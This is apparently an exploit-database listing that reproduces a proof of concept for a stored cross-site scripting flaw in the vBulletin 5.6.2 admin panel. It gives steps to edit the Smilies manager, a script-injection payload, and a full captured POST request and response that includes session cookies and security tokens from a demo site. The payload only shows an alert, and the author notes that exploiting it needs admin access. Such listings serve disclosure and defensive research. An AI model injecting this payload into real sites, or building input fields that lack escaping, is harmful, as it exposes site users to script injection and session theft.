Exploit for vBulletin 5.6.2 Persistent Cross Site Scripting

Name: Exploit for vBulletin 5.6.2 Persistent Cross Site Scripting
Rating: 5 (179 reviews)
2020-08-18 | CVSS -0.4
## https://sploitus.com/exploit?id=PACKETSTORM:158893
# Exploit Title: vBulletin 5.6.2 Stored XSS  
# Date:15.08.2020  
# Author: Vincent666 ibn Winnie  
# Software Link: https://www.vbulletin.com/en/features/  
# Tested on: Windows 10  
# Web Browser: Mozilla Firefox  
# Blog : https://pentest-vincent.blogspot.com/  
# PoC: https://pentest-vincent.blogspot.com/2020/08/vbulletin-562-stored-xss.html  
  
PoC:  
  
Go to the Admin panel -> open Smilies -> Smilies manager->Edit Smilie  
Categories->edit Smile:  
  
https://72329406fb3a-041342.demo.vbulletin.net/admincp/index.php  
  
https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4  
  
Put our code in the field "Title" or "Text to Replace" and other fields.  
  
Our code:  
  
""><script>alert("field")</script><marquee>test</marquee>  
  
And save this. We have a stored XSS and html code injection.  
  
Picture:  
  
https://imgur.com/a/JUsmPye  
  
Video:  
  
https://www.youtube.com/watch?v=D526ZLgH90Y&feature=youtu.be  
  
https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=update  
Host: 72329406fb3a-041342.demo.vbulletin.net  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 399  
Origin: https://72329406fb3a-041342.demo.vbulletin.net  
Connection: keep-alive  
Referer: https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4  
Cookie: vb41342lastvisit=1597392323; vb41342lastactivity=1597521919;  
vb41342np_notices_displayed=; vb41342contentlist_perpage=25;  
vb41342sessionhash=845f579d01bdd42b4bf3020d4893f366;  
PHPSESSID=d8cafaa942534428ce54ea2ba5a221ec7ed9532a6d9666b8;  
BIGipServervbdemo-web_POOL=1459677194.20480.0000;  
vb41342cpsession=18ca6bf5d79e5564ac2aa3a201612500;  
vb41342sitebuilder_active=1  
Upgrade-Insecure-Requests: 1  
s=845f579d01bdd42b4bf3020d4893f366&do=update&adminhash=38c14dd475e4de2e3f95676226993ebd&securitytoken=1597523664-7fba45cf7add9630b2fda3e409ad0da7beec797c&title=Smile""><script>alert("field")</script><marquee>test</marquee>&smilietext=:)&imagespath=smile.png&imagecategoryid=4&displayorder=1&id=1&table=smilie&page=1&perpage=20&massmove=0&returnimagecategoryid=4  
POST: HTTP/1.1 200 OK  
Date: Sat, 15 Aug 2020 20:34:36 GMT  
  
X-Frame-Options: sameorigin  
Content-Security-Policy: frame-ancestors 'self'  
Expires: 0  
Cache-Control: private, post-check=0, pre-check=0, max-age=0  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Encoding: gzip  
Connection: keep-alive, Keep-Alive  
Keep-Alive: timeout=2, max=100  
Transfer-Encoding: chunked  
Content-Type: text/html; charset=UTF-8  
  
p.s.  
Today i haven't idea how to use this bug, because only the admin user  
has an access to the admincp and can insert xss code in the fields.